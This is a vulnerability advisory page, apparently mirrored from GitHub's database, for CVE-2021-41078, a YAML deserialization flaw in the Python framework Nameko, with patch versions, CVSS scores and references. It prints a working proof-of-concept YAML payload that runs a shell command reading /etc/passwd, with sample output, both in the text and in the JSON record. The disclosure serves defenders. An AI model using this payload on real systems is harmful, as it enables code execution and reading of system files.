      "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nameko/nameko"
    }
  ]
}

GHSA-6P52-JR3Q-C94G

Vulnerability from github – Published: 2021-10-19 15:28 – Updated: 2024-10-07 14:45

Summary

Nameko Arbitrary code execution due to YAML deserialization

Details

Impact

Nameko can be tricked to perform arbitrary code execution when deserialising a YAML config file. Example:

# malicious.yaml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

$ nameko run --config malicious.yaml test
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
...

Patches

The problem was fixed in https://github.com/nameko/nameko/pull/722 and released in version 2.14.0, and in rc10 of the v3 pre-release.

Versions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable.

Workarounds

The vulnerability is exploited by config files with malicious content. It can be avoided by only using config files that you trust.

Severity ?

8.6 (High)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

9.3 (Critical)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "nameko"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.14.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.0rc9"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "nameko"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0rc0"
            },
            {
              "fixed": "3.0.0rc10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-41078"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-10-19T15:14:24Z",
    "nvd_published_at": "2021-10-26T13:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "### Impact\n\nNameko can be tricked to perform arbitrary code execution when deserialising a YAML config file. Example:\n\n``` yaml\n# malicious.yaml\n!!python/object/new:type\nargs: [\u0027z\u0027, !!python/tuple [], {\u0027extend\u0027: !!python/name:exec }]\nlistitems: \"__import__(\u0027os\u0027).system(\u0027cat /etc/passwd\u0027)\"\n```\n\n``` shell\n$ nameko run --config malicious.yaml test\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\n... \n```\n\n### Patches\n\nThe problem was fixed in https://github.com/nameko/nameko/pull/722 and released in version 2.14.0, and in rc10 of the v3 pre-release.\n\nVersions prior to 2.14.0, and v3.0.0rc0 through v3.0.0rc9 are still vulnerable.\n\n### Workarounds\n\nThe vulnerability is exploited by config files with malicious content. It can be avoided by only using config files that you trust.",
  "id": "GHSA-6p52-jr3q-c94g",
  "modified": "2024-10-07T14:45:04Z",
  "published": "2021-10-19T15:28:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41078"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nameko/nameko"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nameko/nameko/releases/tag/v2.14.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nameko/nameko/releases/tag/v3.0.0-rc10"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/nameko/PYSEC-2021-383.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Nameko Arbitrary code execution due to YAML deserialization"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2021-41078 (GCVE-0-2021-41078)

GSD-2021-41078

FKIE_CVE-2021-41078

PYSEC-2021-383

GHSA-6P52-JR3Q-C94G

Impact

Patches

Workarounds

Tags

Sightings

Nomenclature